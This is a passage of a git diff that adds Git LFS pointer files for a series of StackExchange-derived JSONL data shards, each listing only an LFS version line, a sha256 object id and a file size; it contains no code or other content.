sha256:d1dfd3d86d218b7ab6a3052887e9bc12dde5b8386cbd47069aeb87662677906f +size 43098092 diff --git a/data/stackexchange/1-1/143_2289.jsonl b/data/stackexchange/1-1/143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9121ddeb5a7b2035136decac7d57cc5c43ea93d6 --- /dev/null +++ b/data/stackexchange/1-1/143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e7ca7ec0295b621812e4376be8e867ad69402478d9567141123f4e3e2511f1 +size 33734349 diff --git a/data/stackexchange/1-1/1440_2289.jsonl b/data/stackexchange/1-1/1440_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8fcebe926c93ee9f25dfd1c542c9775c8c9b7b5 --- /dev/null +++ b/data/stackexchange/1-1/1440_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d012cc6538e7aa623044785a75a04a311da81b63e32415f3f90defb985e0be8 +size 42671455 diff --git a/data/stackexchange/1-1/1441_2289.jsonl b/data/stackexchange/1-1/1441_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b622b4631a38b24387f14248065f4ce6c0311e0 --- /dev/null +++ b/data/stackexchange/1-1/1441_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22b577831f8b7e7cd2c78cb645e5393a35ae534575aa2c1bf4e6b74492e0b232 +size 42132889 diff --git a/data/stackexchange/1-1/1442_2289.jsonl b/data/stackexchange/1-1/1442_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12e04f542780051d16a04c05e31465b577673ef6 --- /dev/null +++ b/data/stackexchange/1-1/1442_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5df2fe0b1c959fcbdcb0341371d975d56d2ec5b1e539b5329c68f9923bfe8e8 +size 43168804 diff --git a/data/stackexchange/1-1/1443_2289.jsonl b/data/stackexchange/1-1/1443_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f9700a7e2c1e7b9ea0e068adf4b2de788d28832 --- /dev/null +++ b/data/stackexchange/1-1/1443_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b47e8a20089bc54af0e2dfd8a7a93e4db48826ce165551b17a74ad1a65d6cec +size 42960608 diff --git a/data/stackexchange/1-1/1444_2289.jsonl b/data/stackexchange/1-1/1444_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36d19ed9c898302f7facf7dcef6ba0daa431fb26 --- /dev/null +++ b/data/stackexchange/1-1/1444_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63c4619feef5c0db77991902fbf4d4ede1efe2a799241d9d0e62a8707a617edb +size 43229790 diff --git a/data/stackexchange/1-1/1445_2289.jsonl b/data/stackexchange/1-1/1445_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1209c418ec70eb0eded641949e9cc5bdfa29c18 --- /dev/null +++ b/data/stackexchange/1-1/1445_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23e3479ff5209901173d9be3f8ede36a0349abef0d8b105db4f1e5a90d661466 +size 43832555 diff --git a/data/stackexchange/1-1/1446_2289.jsonl b/data/stackexchange/1-1/1446_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2df954d84f0d75b36768b639fe48a4ab452fec7a --- /dev/null +++ b/data/stackexchange/1-1/1446_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:affbd623ebd8b43d1efae26d8ba66c179538fe1d3fb180bdb81a7a0452160dd3 +size 42699276 diff --git a/data/stackexchange/1-1/1447_2289.jsonl b/data/stackexchange/1-1/1447_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6acdd375d80792a06a1a882234ef309083a7639e --- /dev/null +++ b/data/stackexchange/1-1/1447_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b54af87752625e5df41334b11a934fb40529585d80d4c677edbb3169591009b +size 42720611 diff --git a/data/stackexchange/1-1/1448_2289.jsonl b/data/stackexchange/1-1/1448_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..914c49bf74bf2714a6a04c9df68103a7399e0a15 --- /dev/null +++ b/data/stackexchange/1-1/1448_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d70eb889e15a521f25162818cbc799cd8116af2003e018ceafc671f5d83141f +size 42501622 diff --git a/data/stackexchange/1-1/1449_2289.jsonl b/data/stackexchange/1-1/1449_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cdef2640dfc6e971db26094740a9d279e7ed424 --- /dev/null +++ b/data/stackexchange/1-1/1449_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b129ce451bbbd32e58fdab8980a726b18a78676d7e50ef3723a5ef0586b04d28 +size 43193163 diff --git a/data/stackexchange/1-1/144_2289.jsonl b/data/stackexchange/1-1/144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed792ce2b005c52f62be922dece9ecea154ff99e --- /dev/null +++ b/data/stackexchange/1-1/144_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3171d237013090229dbc9a9075c8ed5e46353c15bbae8c473544b9388242faa +size 34169290 diff --git a/data/stackexchange/1-1/1450_2289.jsonl b/data/stackexchange/1-1/1450_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e10959dedd04703b0a101c695f293c61c236873a --- /dev/null +++ b/data/stackexchange/1-1/1450_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50318c6ae84e01f31d310dfe6b8be0b3f80a37346398c312cb4d1493a50304f3 +size 42953314 diff --git a/data/stackexchange/1-1/1451_2289.jsonl b/data/stackexchange/1-1/1451_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee419a4a3c14c873198a0fa8c3d2e374f375842e --- /dev/null +++ b/data/stackexchange/1-1/1451_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9a5fd8fdb3282ee1ab5283a214b918140b60ddd129a715c4827a1091491890e +size 43187936 diff --git a/data/stackexchange/1-1/1452_2289.jsonl b/data/stackexchange/1-1/1452_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95e41afb3da38b7ab53f69ff176454d87af61a1e --- /dev/null +++ b/data/stackexchange/1-1/1452_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4af4721ba2e6fac22d7f6f585917016a8cb9e3014dbdc9dca4381b4b56e9aca +size 43373987 diff --git a/data/stackexchange/1-1/1453_2289.jsonl b/data/stackexchange/1-1/1453_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40d60b2f609f094a986e63ed809d8251d00a7783 --- /dev/null +++ b/data/stackexchange/1-1/1453_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1513401548afb58215d65af9ef8fbd0e6fe9c07c63bcb170229d1768f7a0a9b +size 43682164 diff --git a/data/stackexchange/1-1/1454_2289.jsonl b/data/stackexchange/1-1/1454_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53883c0ab0e3feb4695ae51059ef1cdddee28ebf --- /dev/null +++ b/data/stackexchange/1-1/1454_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7747c61a8a4196e6e6146d761952e0fe70d7bd2b1327bfcfdf0308ee4b019525 +size 42245793 diff --git a/data/stackexchange/1-1/1455_2289.jsonl b/data/stackexchange/1-1/1455_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f069b89750a2666dd8f6af8f8ba823afbf2b270 --- /dev/null +++ b/data/stackexchange/1-1/1455_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4580f86d0da4c846fc2872c8cde505746ad366b513f5912766fcacf3767050a7 +size 43792626 diff --git a/data/stackexchange/1-1/1456_2289.jsonl b/data/stackexchange/1-1/1456_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fa3b94f32d78396a0b0457ed55042d6717f4019a --- /dev/null +++ b/data/stackexchange/1-1/1456_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05b4677ea8c89fb9cbcb7d5b7d6c178e0190a2716dcdc0f59a08fd77e9780712 +size 43551746 diff --git a/data/stackexchange/1-1/1457_2289.jsonl b/data/stackexchange/1-1/1457_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fbf04604ebc22de410c8db386ea1ef655c6697a1 --- /dev/null +++ b/data/stackexchange/1-1/1457_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d3ce92487f3df72481418fbe011352de6e63e8680b1206a6c6a5cfaeb893e6d2 +size 43255805 diff --git a/data/stackexchange/1-1/1458_2289.jsonl b/data/stackexchange/1-1/1458_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..787a08dfee10b39ad3f60dec95ebe1c06ed7daef --- /dev/null +++ b/data/stackexchange/1-1/1458_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b38de1ff494acaa0c7b36d1c1f3df9cec97f445f6e5d73a4d95db27762934018 +size 43103415 diff --git a/data/stackexchange/1-1/1459_2289.jsonl b/data/stackexchange/1-1/1459_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7923f04b585e8161cf85d27e111bff4d40f50481 --- /dev/null +++ b/data/stackexchange/1-1/1459_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:becdaa0c74f108db9a04164e1b5e7c4147114368fda2384c9209ec8423da5384 +size 43421424 diff --git a/data/stackexchange/1-1/145_2289.jsonl b/data/stackexchange/1-1/145_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13a3d22c876e050734c2653e41412ecf3202840e --- /dev/null +++ b/data/stackexchange/1-1/145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01aa3fbf32c91c340aa63eab61a50c5b8a3b257d839816942942f0ad7d3a0614 +size 33685701 diff --git a/data/stackexchange/1-1/1460_2289.jsonl b/data/stackexchange/1-1/1460_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3d10efca30fbe48338c31a62bdb2b4a1beaa46c --- /dev/null +++ b/data/stackexchange/1-1/1460_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:408d79e0f8689dc3bac1f92ad0cea7dbbac66d6f12fcc0f7982be34be29b51dd +size 42978850 diff --git a/data/stackexchange/1-1/1461_2289.jsonl b/data/stackexchange/1-1/1461_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f8ddcead89e6b62406955b32cf1c01cae8adc40 --- /dev/null +++ b/data/stackexchange/1-1/1461_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71295da2ed603383b3e02464f7a74cf361cc2b7988dcdb21ab346e41891dc86f +size 44262721 diff --git a/data/stackexchange/1-1/1462_2289.jsonl b/data/stackexchange/1-1/1462_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f9fbb65c78dfdecb9912bfd86603af9bf1ba0935 --- /dev/null +++ b/data/stackexchange/1-1/1462_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:415c39bb939f00babd2e5853185f0884bec3650bd82012c9a633c14249f7e090 +size 42841382 diff --git a/data/stackexchange/1-1/1463_2289.jsonl b/data/stackexchange/1-1/1463_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..feaff53af6a1af92ea6574850a3e4c6cfd39380a --- /dev/null +++ b/data/stackexchange/1-1/1463_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:592fe845581210614a1589a9aa11d72b794dae058d0fb2c23a3b6cb47d0af5ea +size 42118132 diff --git a/data/stackexchange/1-1/1464_2289.jsonl b/data/stackexchange/1-1/1464_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ecd99efc262c2ef2d91e153fbcba5f3782d86b7 --- /dev/null +++ b/data/stackexchange/1-1/1464_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a942059c2005cddcc97e04e955ae8742cfc872f8443e0ba7b136f53c8efdc0b +size 43096278 diff --git a/data/stackexchange/1-1/1465_2289.jsonl b/data/stackexchange/1-1/1465_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe66e5bbe0f7a4732409760ec2acc4b4f395e3bb --- /dev/null +++ b/data/stackexchange/1-1/1465_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8bd4e51c531a7a6aa9642b877ea2dca2e9ed485a24c9fc8c5276692d75ecb77 +size 42926038 diff --git a/data/stackexchange/1-1/1466_2289.jsonl b/data/stackexchange/1-1/1466_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d77f94db0edaf4a30da8c12a7946b5950ab28b4 --- /dev/null +++ b/data/stackexchange/1-1/1466_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b832056f6c8f214656ac24764a3256a0f8e38c89a760f8f5743c4aee3f04daf +size 42811806 diff --git a/data/stackexchange/1-1/1467_2289.jsonl b/data/stackexchange/1-1/1467_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e7631bed56304debea0dc579f87f1ec92e1f232 --- /dev/null +++ b/data/stackexchange/1-1/1467_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a5afced7ca85b8266ee23a077f841a8cb14668de6aa11fb644429d6ff5a30fe +size 42807950 diff --git a/data/stackexchange/1-1/1468_2289.jsonl b/data/stackexchange/1-1/1468_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7423b20788a0f0710a46bbaa5f65d5ea99a7dd01 --- /dev/null +++ b/data/stackexchange/1-1/1468_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c1ac819e8350c187e93d57caa4f86afba1b3587599ff2f5772b8ca2b687854f +size 42738897 diff --git a/data/stackexchange/1-1/1469_2289.jsonl b/data/stackexchange/1-1/1469_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3261157e20ac39edb5892938ae95a7a9e6252856 --- /dev/null +++ b/data/stackexchange/1-1/1469_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d89da53fd0a2105cd020cbbcd8645a34ed80cf4b11c7dc4b29bbfd94dbaa462e +size 42944481 diff --git a/data/stackexchange/1-1/146_2289.jsonl b/data/stackexchange/1-1/146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dcc6e71a9a75382695d5713d2ff63a88892582b4 --- /dev/null +++ b/data/stackexchange/1-1/146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5ddf90a63acc56188ff430a455f24e659f93c78973324e8540e01bf7d411683 +size 33455818 diff --git a/data/stackexchange/1-1/1470_2289.jsonl b/data/stackexchange/1-1/1470_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f583155d12d176c66d5117d0e67886db428ccce --- /dev/null +++ b/data/stackexchange/1-1/1470_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1955705b237c9491038bf6c494140957e6aec5c6208f63904a69c404fcc5d0f4 +size 43468481 diff --git a/data/stackexchange/1-1/1471_2289.jsonl b/data/stackexchange/1-1/1471_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf3fd53f45fd8ac4916b09cc26a8fc21e458fe56 --- /dev/null +++ b/data/stackexchange/1-1/1471_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e44990778b775d64b22adc15fbac708c739e55e67bb7d03010c58c33fb8b6e0d +size 42796068 diff --git a/data/stackexchange/1-1/1472_2289.jsonl b/data/stackexchange/1-1/1472_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c259e5c9c44bd15803f4d010bb69c54604a5c13 --- /dev/null +++ b/data/stackexchange/1-1/1472_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9572d77460712fe98770a9caab80b9b894711f402743906e26a548e1bb0eedd1 +size 43202870 diff --git a/data/stackexchange/1-1/1473_2289.jsonl b/data/stackexchange/1-1/1473_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23fef69ee5b609f0c95f744da9b248ff328c46b2 --- /dev/null +++ b/data/stackexchange/1-1/1473_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78e81c7aa0dbef5081d7178475490c8cf18a614aa059f4016c52c5506bacf324 +size 42519024 diff --git a/data/stackexchange/1-1/1474_2289.jsonl b/data/stackexchange/1-1/1474_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e59699f460a6da860f279b06228aa61d3ec65cd2 --- /dev/null +++ b/data/stackexchange/1-1/1474_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0abcece2b5962d84cf25d8521f0fb7ad5299bdde15e5f474b472b628e17807d2 +size 42927417 diff --git a/data/stackexchange/1-1/1475_2289.jsonl b/data/stackexchange/1-1/1475_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2715705448be3c575aa9d4b766ae9b25eaa6649 --- /dev/null +++ b/data/stackexchange/1-1/1475_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f5218e614a1143e1d1f08aecf3dd0951eb6c09fcdd0235f8736d2cb26ae9980 +size 42891892 diff --git a/data/stackexchange/1-1/1476_2289.jsonl b/data/stackexchange/1-1/1476_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..543202a544458a854f8bb7c0df45582089101454 --- /dev/null +++ b/data/stackexchange/1-1/1476_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58ffb8e2bf14497becc639aace0f48bf9efac8a44bf230fd928eceb292f71e6b +size 43103459 diff --git a/data/stackexchange/1-1/1477_2289.jsonl b/data/stackexchange/1-1/1477_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f26642eb183b1d5c2d9350a121b8f736b89a910c --- /dev/null +++ b/data/stackexchange/1-1/1477_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef64a21625fb865d92146f466ebd73762cdf00baf8bf2e5358ed347b454fffea +size 42966645 diff --git a/data/stackexchange/1-1/1478_2289.jsonl b/data/stackexchange/1-1/1478_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97bf86b18cd417c790b78fd3cf1ffbae823e5a66 --- /dev/null +++ b/data/stackexchange/1-1/1478_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9541715903c19e3754e663e00f5b29dbf8a860932cc02f46e1493e26c4f319df +size 42775636 diff --git a/data/stackexchange/1-1/1479_2289.jsonl b/data/stackexchange/1-1/1479_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e2c382a502cf403a379896cc5c2dc4692654df8 --- /dev/null +++ b/data/stackexchange/1-1/1479_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8acf1cce9b57f1a658e3750cb9b4ea73d933cff76d6286e4a6d810eaccf14c28 +size 43632366 diff --git a/data/stackexchange/1-1/147_2289.jsonl b/data/stackexchange/1-1/147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9579d73bf69335bc1ef2540d04b32d7d7262ec4 --- /dev/null +++ b/data/stackexchange/1-1/147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e61125e93a544e4b961d70de898dd678c62a50dcd6fd6e7eec60731371d69da4 +size 33692694 diff --git a/data/stackexchange/1-1/1480_2289.jsonl b/data/stackexchange/1-1/1480_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b34c6fd26ad0f3798c5922f2712225ffeaccb24 --- /dev/null +++ b/data/stackexchange/1-1/1480_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e476a20d1f3180eb08f0841d252e99ea6cf11f5e37f06aa9c0d8025d4dc38994 +size 42402418 diff --git a/data/stackexchange/1-1/1481_2289.jsonl b/data/stackexchange/1-1/1481_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7ed79f6c1ae4e0205481653b2f7f575b2b18e23 --- /dev/null +++ b/data/stackexchange/1-1/1481_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6643a0a6fcaa978d2931293c77a3af83a293d62da8e53f9a6f2d11a72e50e00c +size 42674854 diff --git a/data/stackexchange/1-1/1482_2289.jsonl b/data/stackexchange/1-1/1482_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb568bd086b0d5c39bda178bc5ec5e2e31c5ce76 --- /dev/null +++ b/data/stackexchange/1-1/1482_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18e139eb3afed3d9654291b8a6603fe9f16a39a7033b531efcf9dfe61de0a42 +size 42720951 diff --git a/data/stackexchange/1-1/1483_2289.jsonl b/data/stackexchange/1-1/1483_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a072764e582764bb7a3860baeb17495f0b4f4d6 --- /dev/null +++ b/data/stackexchange/1-1/1483_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:167066a2128d577b66874d89c1c44990e2e2cc5a6c1470dadd49f0c02ed4d1b3 +size 42747304 diff --git a/data/stackexchange/1-1/1484_2289.jsonl b/data/stackexchange/1-1/1484_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5903027623c878bb8da00069103658250490bfd7 --- /dev/null +++ b/data/stackexchange/1-1/1484_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80b46c75fa3a07adfa8f93bb51df645ba84c4acb3a6701035950c99575c436b2 +size 42831219 diff --git a/data/stackexchange/1-1/1485_2289.jsonl b/data/stackexchange/1-1/1485_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b01b03263311bc6775d21db3bfc9a67b640318 --- /dev/null +++ b/data/stackexchange/1-1/1485_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b70906615ccbe22bfafdba241a5a30654e5e4fd064ede78cbf0d7d357468f5e5 +size 43069289 diff --git a/data/stackexchange/1-1/1486_2289.jsonl b/data/stackexchange/1-1/1486_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f69e3dde67df6f58b3b80d5f1503a50032fa8d41 --- /dev/null +++ b/data/stackexchange/1-1/1486_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bd56b8eb3429a7fb8abc75d027dfcfee03b33d1f6bfe3ca0738e4c5a03bd7bb +size 43745262 diff --git a/data/stackexchange/1-1/1487_2289.jsonl b/data/stackexchange/1-1/1487_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43a5b6d3b4c49ff378fe40fa5853450524234d47 --- /dev/null +++ b/data/stackexchange/1-1/1487_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdf7b608cac68048309a7a7f7c6bf9c5b89e6509a121afdeec6b21d0c2b45e54 +size 42693486 diff --git a/data/stackexchange/1-1/1488_2289.jsonl b/data/stackexchange/1-1/1488_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c28112ef44c81682cfbeec9854dfdf5025ec15b --- /dev/null +++ b/data/stackexchange/1-1/1488_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b7ed94992092522aa5f76b79e47b398d0e3eab3f7c45da161fb32f93f3fceb8 +size 42886583 diff --git a/data/stackexchange/1-1/1489_2289.jsonl b/data/stackexchange/1-1/1489_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f5270ed3862914acbf9a7400b3062a434926c827 --- /dev/null +++ b/data/stackexchange/1-1/1489_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb28f35dc0d1d1a0640b0d2e1d270e2950d28ff6533464d8dacea29274ccf049 +size 35498250 diff --git a/data/stackexchange/1-1/148_2289.jsonl b/data/stackexchange/1-1/148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbc342744e3ed9290393879a5a9c1d6d3f39d277 --- /dev/null +++ b/data/stackexchange/1-1/148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b938f2852f7aa33bb297b34333e743eeb4afe194f25f8c1fffd4d25369be52f +size 34015423 diff --git a/data/stackexchange/1-1/1490_2289.jsonl b/data/stackexchange/1-1/1490_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..433d47b7de04964e6603b44ac26597d318c1f05a --- /dev/null +++ b/data/stackexchange/1-1/1490_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ee09138a6b714118326173a92c2ba1b482677b7c966a036e7645680cd5e461e +size 34365669 diff --git a/data/stackexchange/1-1/1491_2289.jsonl b/data/stackexchange/1-1/1491_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8384cb21d7c10b2674b063737ec4d8810c23463a --- /dev/null +++ b/data/stackexchange/1-1/1491_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46c03afbe597b971778fc6f07d2a6c20d52e6d727abe5c2c66d0a999f28b216e +size 34277622 diff --git a/data/stackexchange/1-1/1492_2289.jsonl b/data/stackexchange/1-1/1492_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..826ab5ec602574180a53c1bf59997b07eba1111a --- /dev/null +++ b/data/stackexchange/1-1/1492_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a3cb12c21c6e93ba693dc50c03ab0ce62ac1b593057c2bb1f7338a6d5ca9b9f +size 35000803 diff --git a/data/stackexchange/1-1/1493_2289.jsonl b/data/stackexchange/1-1/1493_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf1a3d2a1affbeb4acb131f2cb6488c7b8e649ac --- /dev/null +++ b/data/stackexchange/1-1/1493_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e45ca0a99e8c125c46ee5d09633beb3be10d60d627127c66fc06057dd53a8f69 +size 34700357 diff --git a/data/stackexchange/1-1/1494_2289.jsonl b/data/stackexchange/1-1/1494_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..324d1c4922a4c194dce6834a8d56754ef0497204 --- /dev/null +++ b/data/stackexchange/1-1/1494_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2241ab0cd056d2d86733183ec049bda9cd558d7731e96a2dabeedb23d58f65e +size 34114164 diff --git a/data/stackexchange/1-1/1495_2289.jsonl b/data/stackexchange/1-1/1495_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7d6727ae7e81e8d76c6f42538db651f8324d59e --- /dev/null +++ b/data/stackexchange/1-1/1495_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5730845b992f8a15d4792f480e97491c8fd3487f7a566e1d79daddc0d4585c23 +size 34315009 diff --git a/data/stackexchange/1-1/1496_2289.jsonl b/data/stackexchange/1-1/1496_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4d7645d04db480c5bf79e5e0ef92c208db6cd13 --- /dev/null +++ b/data/stackexchange/1-1/1496_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee14cd73f9755faa3d3b189b3cbf78d3f1a76c7485856f5ae59a9270a5e12d38 +size 34591942 diff --git a/data/stackexchange/1-1/1497_2289.jsonl b/data/stackexchange/1-1/1497_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ae75ae999eda35c67cdf64e9f1d7ce97af2f75d --- /dev/null +++ b/data/stackexchange/1-1/1497_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47c5c7a46da1ce09676e67787600ec048fbb62b02683e9bb0d3a0ac669bfd947 +size 34525434 diff --git a/data/stackexchange/1-1/1498_2289.jsonl b/data/stackexchange/1-1/1498_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..779572400f01d63c47c7fba2b06f73573d853272 --- /dev/null +++ b/data/stackexchange/1-1/1498_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 